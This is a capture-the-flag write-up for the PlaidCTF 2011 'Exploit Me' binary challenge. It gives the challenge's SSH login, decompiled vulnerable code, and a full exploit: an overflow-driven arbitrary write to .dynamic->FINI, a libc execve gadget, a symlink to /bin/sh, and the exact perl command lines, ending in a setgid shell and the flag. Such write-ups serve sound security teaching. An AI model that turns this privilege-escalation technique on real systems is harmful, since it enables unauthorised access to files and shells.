PlaidCTF 2011 #23 – Exploit Me :p (200)

Category: pwnables

It seems like AED also has some plans to raise hacker force!
We found this binary as an exploitation practice program in the office, but they forgot to remove the setgid flag on the program.
So we can get the secret key!

ssh username@a5.amalgamated.biz

Username: exp_1
Password: jNKpzFuRLpsIW9xzqNIpCVF1

Summary: .dynamic->FINI overwriting, execl symlink

binary

This is the only function of the program (main only does atoi of 2nd and 3rd arguments):

void __cdecl sub_8048575(const char *argv1,
int argv2atoi, size_t argv3atoi)
{
  char v3; // [sp+10h] [bp-5Ch]@2
  size_t v4; // [sp+50h] [bp-1Ch]@2

  if ( argv3atoi <= 71 )
  {
    v4 = argv3atoi;
    strncpy(&v3, argv1, argv3atoi);
    if ( v4 )
      *v4 = argv2atoi;
    exit(0);
  }
}

Ok, we can overwrite v4 variable, and, because it’s used as a pointer, we can overwrite arbitrary address. What we should overwrite? One my tool showed that dtors are a bad case, but luckily, .dynamic->FINI is ok:

exploitme $ elfinfo exploitme
Info for 'exploitme':
   i DYNAMIC SECTION: 0x80496f4 RW
   + DYNAMIC most probably IS writeable at runtime
   i FINI: 0x8049708
   - STACK IS NOT executable
   i DTORS 0x80496e8 WA, next 0x80496ec [ffffffff00000000]
   - DTORS are not working, bad style found

So, we will overwrite 0x8049708 to whatever-we-want. Let’s put there smth and look what arguments are passed:

exp_1@a5:~$ ulimit -s unlimited  # disable libc ASLR

exp_1@a5:~$ gdb --args /opt/pctf/exploit/exploitMe "`perl -e 'print
"A"x64 . "\x08\x97\x04\x08";'`" "`perl -e 'print 0x41424344'`" 71
(gdb) r
Program received signal SIGSEGV, Segmentation fault.
0x41424344 in ?? ()
(gdb) x/20xw $esp
0xbfefbcbc:    0x4000e226    0x4001c4e4    0x00000000    0x00000000
(gdb) x/1s 0x4001c4e4
0x4001c4e4 <_rtld_global+1220>:     ""

Oh no, empty string :( Luckily, there are lot of gadgets calling execve in libc, and I found an appropriate one:

(gdb) x/2i &execl-12
0x400bcb54 <execle+324>:    mov    %eax,(%esp)
0x400bcb57 <execle+327>:    call   0x400bc870 <execve>
(gdb) p/x $eax
$1 = 0x41424344
(gdb) x/1s &execl-12
0x400bcb54 <execle+324>: "\211\004$\350\024\375\377\377뇐\220UW
VS\201\354\030\020"

Ok, now we just create a symlink to /bin/sh (No arguments are passed to him, so no wrapper is needed), and run an exploit:

exp_1@a5:~$ ln -s /bin/sh $'\211\004$\350\024\375\377\377뇐\220UW
VS\201\354\030\020'
exp_1@a5:~$ /opt/pctf/exploit/exploitMe "`perl -e 'print "A"x64 .
"\x08\x97\x04\x08";'`" "`perl -e 'print 0x400bcb54'`" 71
$ id
uid=6001(exp_1) gid=1007(expusers) egid=1008(expkey) groups=1007(expusers)
$ cat /opt/pctf/exploit/key
K3Ys_t0_15_M1nUtEs_0f_F4mE

The flag: K3Ys_t0_15_M1nUtEs_0f_F4mE